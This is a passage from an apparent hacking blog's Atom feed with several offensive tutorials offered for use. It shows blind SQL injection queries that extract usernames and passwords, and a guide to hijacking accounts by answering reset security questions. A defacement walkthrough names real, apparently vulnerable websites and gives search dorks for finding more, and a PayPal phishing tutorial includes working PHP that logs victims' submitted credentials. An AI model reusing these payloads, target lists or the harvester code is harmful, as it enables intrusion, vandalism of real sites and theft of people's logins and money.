/&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;99&lt;/blockquote&gt;&lt;br /&gt;TRUE, the page loads normally, higher.&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;107&lt;/blockquote&gt;&lt;br /&gt;FALSE, lower number.&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;104&lt;/blockquote&gt;&lt;br /&gt;TRUE, higher.&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;105&lt;/blockquote&gt;&lt;br /&gt;FALSE!!!&lt;br /&gt;&lt;br /&gt;we know that the second character is char(105) and that is 'i'. We have 'ci' so far&lt;br /&gt;&lt;br /&gt;so keep incrementing until you get the end. (when &amp;gt;0 returns false we know that we have reach the end).&lt;br /&gt;&lt;br /&gt;There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,&lt;br /&gt;&lt;br /&gt;cause that makes you better SQL INJECTOR big_smile&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hope you learned something from this paper.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Have FUN! (:&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Credits :&lt;/span&gt;&lt;br /&gt;&lt;a href="https://www.facebook.com/pages/Cat-Devilcode/301860916498135" style="background-color: white; color: #3b5998; cursor: pointer; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px; text-align: left; text-decoration: none;"&gt;Cat- Devilcode&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-4399487563135134063?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/4399487563135134063/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/sql-injection-manual.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/4399487563135134063'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/4399487563135134063'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/sql-injection-manual.html' title='SQL Injection [Manual]'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_ZynwKym3gXI/TUHriq0D8jI/AAAAAAAAAd0/3a1k4Vyg_YY/s72-c/sql_injection.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-2584825004100325712</id><published>2011-11-21T19:57:00.000-08:00</published><updated>2011-12-14T20:40:26.622-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Hacking using the "Forgot Your Password"</title><content type='html'>This is the easiest to use by a normal hacker do his account of a trespass. Here all information and data collected will be dedicated to the process of returning the victim to guess the password security question (Secret Question) are usually not taken seriously by some individuals. Hackers enter all the data necessary to restore the password to the words and things that are easily available on the nature and behavior tingah victim either in terms of personality, hobbies and so on. Armed with the information obtained, the security question is often asked, such as date of birth, postcode and place of residence can be answered easily and thus can change the password of the victim. Although sometimes hackers can not answer the question correctly, they will try the next day because there are systems such as the Yahoo allows the user to enter 10 times after a failed attempt and making the system will block your account for 24 hours. So hackers will try to find the all the information that enables them to intrude into your personal account.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;The Steps :&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-tKa0eQCQgfA/TssbTPLgZhI/AAAAAAAAAh0/3f6v0qzThQQ/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="192" src="http://4.bp.blogspot.com/-tKa0eQCQgfA/TssbTPLgZhI/AAAAAAAAAh0/3f6v0qzThQQ/s320/1.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;1. Find victim email :&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-tBCYe9Zibo0/Tssbx-w7KqI/AAAAAAAAAh8/WLpucuzn1Bw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="147" src="http://2.bp.blogspot.com/-tBCYe9Zibo0/Tssbx-w7KqI/AAAAAAAAAh8/WLpucuzn1Bw/s320/1.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;2. Try "Forgot my Password"&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-XkGleCqoLkA/TsschZfDVuI/AAAAAAAAAiE/OTRRAcMFMqQ/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="144" src="http://4.bp.blogspot.com/-XkGleCqoLkA/TsschZfDVuI/AAAAAAAAAiE/OTRRAcMFMqQ/s320/1.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;3. Try Answer the Security Question :)&lt;br /&gt;4. After you got the Email, Try reset the victim account .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-2584825004100325712?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/2584825004100325712/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/hacking-using-your-password.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/2584825004100325712'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/2584825004100325712'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/hacking-using-your-password.html' title='Hacking using the &amp;quot;Forgot Your Password&amp;quot;'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-tKa0eQCQgfA/TssbTPLgZhI/AAAAAAAAAh0/3f6v0qzThQQ/s72-c/1.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-2377207041603229309</id><published>2011-11-21T19:09:00.000-08:00</published><updated>2011-12-14T20:40:26.641-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Advanced Deface Page Creator</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://media.scmagazineus.com/images/2009/01/05/PalesPic_36134.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://media.scmagazineus.com/images/2009/01/05/PalesPic_36134.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;A website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.&lt;br /&gt;The most common method of defacement is using SQL Injections to log on to administrator accounts. Defacements usually consist of an entire page. This page usually includes the defacer's pseudonym or "Hacking Codename." Sometimes, the Website Defacer makes fun of the system administrator for failing to maintain server security. Most times, the defacement is harmless, however, it can sometimes be used as a distraction to cover up more sinister actions such as uploading malware or deleting essential files from the server.&lt;br /&gt;A high-profile website defacement was carried out on the website of the company SCO Group following its assertion that Linux contained stolen code. The title of the page was changed from "Red Hat v. SCO" to "SCO vs World," with various satirical content following.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Features :&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Choose Sitetitle&lt;/li&gt;&lt;li&gt;Write down some texts&lt;/li&gt;&lt;li&gt;Create an error&lt;/li&gt;&lt;li&gt;Fade-in a picture&lt;/li&gt;&lt;li&gt;Background music&lt;/li&gt;&lt;li&gt;Javascript box&lt;/li&gt;&lt;li&gt;Funny circle around the curser&lt;/li&gt;&lt;li&gt;Choose textcolor&lt;/li&gt;&lt;li&gt;Choose backgroundcolor&lt;/li&gt;&lt;li&gt;Hide Sourcecode&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i32.tinypic.com/ih1krq.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://i32.tinypic.com/ih1krq.jpg" width="313" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i27.tinypic.com/2u74s2e.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://i27.tinypic.com/2u74s2e.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Download Link :&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.digzip.com/files/BFEFY2CN/Advanced"&gt;Advanced Deface Creator&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-2377207041603229309?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/2377207041603229309/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/advanced-deface-page-creator.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/2377207041603229309'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/2377207041603229309'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/advanced-deface-page-creator.html' title='Advanced Deface Page Creator'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i32.tinypic.com/ih1krq_th.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-6713935630776638690</id><published>2011-11-21T18:54:00.000-08:00</published><updated>2011-12-14T20:40:26.654-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Deface'/><title type='text'>[TUT] Deface via WebFolder [TUT]</title><content type='html'>&lt;span class="Apple-style-span"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;If you have successfully opened the web folder and right-click and select New - Web FolderWebFolders allow you to drag/drop, cut-n-paste files between your PC and your IBackup account, and direct editing of supported office files including Word, Excel and PowerPoint directly from within Internet Explorer or from your Desktop. A WebFolder is a shortcut to a remote Internet folder like your IBackup account. WebFolders is a convenient way to store and retrieve files between your computer and your IBackup account from Windows Explorer and Internet Explorer. It is highly recommended for corporate environments due to its firewall friendliness and full 128 bit SSL support. WebFolders allow you to treat your IBackup account pretty much like a regular folder on Windows Explorer.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;Windows XP :&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;1. On Desktop, Right Click &amp;amp; Choose '&lt;b&gt;New Shortcut&lt;/b&gt;'&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-82BYGgdOoik/TssLtIq1DaI/AAAAAAAAAhs/BZO3DhFDJ50/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="233" src="http://3.bp.blogspot.com/-82BYGgdOoik/TssLtIq1DaI/AAAAAAAAAhs/BZO3DhFDJ50/s320/1.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-family: inherit; line-height: 18px;"&gt;2. There will be a popup box asking to enter the destination location, then you enter the address below:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;3.&amp;nbsp;If you have successfully opened the web folder and right-click and select New - Web Folder&lt;br /&gt;4. Then a popup will appear asking to enter destination addresses. For example, you enter&amp;nbsp;&lt;span class="Apple-style-span" style="color: red;"&gt;www.zjgsxy.com&lt;/span&gt;&lt;br /&gt;5.&amp;nbsp;Copy and paste an html file to the web folder to the folder you made&lt;br /&gt;6.&amp;nbsp;If the copy and paste is complete, for example if your file name is "test.html" the way to see is to open a browser and type in the address : &lt;span class="Apple-style-span" style="color: red;"&gt;www.zjgsxy.com/test.html&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span"&gt;&lt;b&gt;Windows Vista &amp;nbsp;:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;span class="Apple-style-span"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"&gt;1. Open 'Computer' &amp;amp;&amp;nbsp;Click on “Map network drive” in the horizontal menu.&lt;br /&gt;2. Click on “Connect to a Web site that you can use to store your documents and pictures”.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"&gt;3. Click on &amp;nbsp;“Choose a custom network location”.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"&gt;4. Enter the URL , Example :&amp;nbsp;&lt;span class="Apple-style-span" style="color: red;"&gt;www.zjgsxy.com&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"&gt;5. Enter to the&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;www.zjgsxy.com &lt;/span&gt;folder &amp;amp; Copy your Defacement page to&amp;nbsp;&lt;span class="Apple-style-span" style="color: red;"&gt;www.zjgsxy.com&lt;/span&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;b&gt;Windows 7 :&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;1. In my 'Computer', Right click &amp;amp; Choose "Add a network location"&lt;br /&gt;2.&amp;nbsp;"Add Network Location Wizard" will appear click next.&lt;/div&gt;&lt;div&gt;3. When asked "Add Network Location Wizard", then select Custom Network then click "Next"&lt;br /&gt;4.&amp;nbsp;For the "Internet or network location" please put &lt;span class="Apple-style-span" style="color: red;"&gt;www.zjgsxy.com&lt;/span&gt;&lt;/div&gt;&lt;div&gt;5.&amp;nbsp;When you see the "completing the Add Network Location Wizard". Tick&amp;nbsp;"Open the network location When I click Finish" and finish ..&lt;/div&gt;&lt;div&gt;6.Copy your Defacement page to the Folder &amp;amp; Your Defacement address will be like this : &lt;span class="Apple-style-span" style="color: red;"&gt;www.zjgsxy.com/test.html&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Vuln Website List :&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;strike&gt;zgsfjw.net&lt;/strike&gt; &lt;span class="Apple-style-span" style="color: red;"&gt;[Patched]&amp;nbsp;&lt;/span&gt;&lt;br /&gt;centro.anje.pt&lt;br /&gt;www.ziangli.com&lt;br /&gt;6.shicheng.gov.cn&lt;br /&gt;www.ville-mordelles.fr&lt;br /&gt;www.podiocom.com&lt;br /&gt;www.journeezerotracas.fr&lt;br /&gt;&lt;strike&gt;www.journeezerotracas.com&lt;/strike&gt; &lt;span class="Apple-style-span" style="color: red;"&gt;[Patched]&lt;/span&gt;&lt;br /&gt;www.journee0tracas.com&lt;br /&gt;www.comune.torrice.fr.it&lt;br /&gt;www.chinamaster88.com&lt;br /&gt;www.chateaudelepinay.fr&lt;br /&gt;www.centroformazioneitalia.it&lt;br /&gt;www.bjautoobd.com&lt;br /&gt;www.autodiagtool.com&lt;br /&gt;usa.automotormaster.com&lt;br /&gt;so-sighty.fr&lt;br /&gt;perros-guirec.icor.fr&lt;br /&gt;myhealthcity.com&lt;br /&gt;&lt;strike&gt;malaysiahealthcareindonesia.com&lt;/strike&gt; &lt;span class="Apple-style-span" style="color: red;"&gt;[Patched]&lt;/span&gt;&lt;br /&gt;lapetitehublais.fr&lt;br /&gt;handistar.fr&lt;br /&gt;gz.autoobd-ii.com&lt;br /&gt;gz.automotormaster.com&lt;br /&gt;expert-comptable-35.fr&lt;br /&gt;carrelages-palmieri.com&lt;br /&gt;camion-road-show.com&lt;br /&gt;autoobd.cn&lt;br /&gt;hibis.co.id&lt;br /&gt;www.zjgsxy.com&lt;/blockquote&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;If you need the Dork. Here it is :&amp;nbsp;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;inurl:.ah.cn/*.asp&lt;br /&gt;inurl:.bj.cn/*.asp&lt;br /&gt;inurl:.cq.cn/*.asp&lt;br /&gt;inurl:.fj.cn/*.asp&lt;br /&gt;inurl:.gd.cn/*.asp&lt;br /&gt;inurl:.gs.cn/*.asp&lt;br /&gt;inurl:.gz.cn/*.asp&lt;br /&gt;inurl:.gx.cn/*.asp&lt;br /&gt;inurl:.ha.cn/*.asp&lt;br /&gt;inurl:.hb.cn/*.asp&lt;br /&gt;inurl:.he.cn/*.asp&lt;br /&gt;inurl:.hi.cn/*.asp&lt;br /&gt;inurl:.hl.cn/*.asp&lt;br /&gt;inurl:.hn.cn/*.asp&lt;br /&gt;inurl:.jl.cn/*.asp&lt;br /&gt;inurl:.js.cn/*.asp&lt;br /&gt;inurl:.jx.cn/*.asp&lt;br /&gt;inurl:.ln.cn/*.asp&lt;br /&gt;inurl:.nm.cn/*.asp&lt;br /&gt;inurl:.nx.cn/*.asp&lt;br /&gt;inurl:.qh.cn/*.asp&lt;br /&gt;inurl:.sc.cn/*.asp&lt;br /&gt;inurl:.sd.cn/*.asp&lt;br /&gt;inurl:.sh.cn/*.asp&lt;br /&gt;inurl:.sn.cn/*.asp&lt;br /&gt;inurl:.sx.cn/*.asp&lt;br /&gt;inurl:.tj.cn/*.asp&lt;br /&gt;inurl:.tw.cn/*.asp&lt;br /&gt;inurl:.xj.cn/*.asp&lt;br /&gt;inurl:.xz.cn/*.asp&lt;br /&gt;inurl:.yn.cn/*.asp&lt;br /&gt;inurl:.zj.cn/*.asp&lt;br /&gt;inurl:.ac.cn/*.asp&lt;br /&gt;inurl:.com.cn/*.asp&lt;br /&gt;inurl:.edu.cn/*.asp&lt;br /&gt;inurl:.gov.cn/*.asp&lt;br /&gt;inurl:.net.cn/*.asp&lt;br /&gt;inurl:.org.cn/*.asp&lt;/blockquote&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-6713935630776638690?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/6713935630776638690/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/tut-deface-via-webfolder-tut.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/6713935630776638690'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/6713935630776638690'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/tut-deface-via-webfolder-tut.html' title='[TUT] Deface via WebFolder [TUT]'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-82BYGgdOoik/TssLtIq1DaI/AAAAAAAAAhs/BZO3DhFDJ50/s72-c/1.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-5729240180713882479</id><published>2011-11-21T17:17:00.000-08:00</published><updated>2011-12-14T20:40:26.666-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fake Site'/><title type='text'>Fake Site (Phishing)</title><content type='html'>Phishing is a way of attempting to acquire information such as usernames,passwords, and credit card details by masquerading as a trustworthy entity in anelectronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mailspoofing or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.&lt;br /&gt;A phishing technique was described in detail in 1987, and the first recorded use of the term "phishing" was made in 1996. The term is a variant of fishing,[4] probably influenced by phreaking,[5] [6] and alludes to "baits" u&lt;br /&gt;&lt;br /&gt;&lt;b&gt;How to make Fake Site?&lt;/b&gt;&lt;br /&gt;In this tutorial, we will use &lt;a href="https://www.paypal.com/my/cgi-bin/webscr?cmd=_login-run"&gt;PayPal&lt;/a&gt; site to make a fake site :)&lt;br /&gt;&lt;br /&gt;1. Open the PayPal site using Google Chrome or Mozilla FireFox.&lt;br /&gt;2. Stay at Login Page &amp;amp; Save the Login Page (CTRL+P)&lt;br /&gt;3. Copy this code &amp;amp; Save as &lt;b&gt;login.php&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&amp;lt;?php&lt;br /&gt;header ('Location: http://paypal.com/ ');&lt;br /&gt;$handle = fopen("data.txt", "a");&lt;br /&gt;foreach($_POST as $variable =&amp;gt; $value) {&lt;br /&gt;fwrite($handle, $variable);&lt;br /&gt;fwrite($handle, "=");&lt;br /&gt;fwrite($handle, $value);&lt;br /&gt;fwrite($handle, "\r\n");&lt;br /&gt;}&lt;br /&gt;fwrite($handle, "\r\n");&lt;br /&gt;fclose($handle);&lt;br /&gt;exit;&lt;br /&gt;?&amp;gt;&amp;nbsp;&lt;/blockquote&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-YLBIRPtFi4g/Tsr20wGZD7I/AAAAAAAAAhc/BMmnGqOdTTs/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://1.bp.blogspot.com/-YLBIRPtFi4g/Tsr20wGZD7I/AAAAAAAAAhc/BMmnGqOdTTs/s320/1.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;4. Open Saved PayPal Site with Notepad. (The HTML).&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-NmACRl2PfgY/Tsr3xp06FoI/AAAAAAAAAhk/dd4QSYKgo3s/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-NmACRl2PfgY/Tsr3xp06FoI/AAAAAAAAAhk/dd4QSYKgo3s/s320/1.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;5.Find this line &amp;amp; change it to your&amp;nbsp;&lt;b style="text-align: -webkit-auto;"&gt;login.php&lt;/b&gt;&lt;span class="Apple-style-span" style="text-align: -webkit-auto;"&gt;&amp;nbsp;Location&lt;/span&gt;&lt;/div&gt;6. Upload your Fake site &amp;amp; Start Promote it :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Example of Fake Site&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_Q-3_PaJrcLs/SlK6KoeOSvI/AAAAAAAABTs/f649AP1Tpus/s400/suspicious+phishing+yahoo+web+page.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/_Q-3_PaJrcLs/SlK6KoeOSvI/AAAAAAAABTs/f649AP1Tpus/s320/suspicious+phishing+yahoo+web+page.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;Yahoo.com&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.snipe.net/wp-content/uploads/2009/05/picture-212.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="213" src="http://www.snipe.net/wp-content/uploads/2009/05/picture-212.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;Facebook.com&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://rmreview.com.my/wp-content/uploads/2010/04/MUDAH.MY-PARTNER-PAYPAL-FOR-SAFE-ONLINE-PAYMENT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 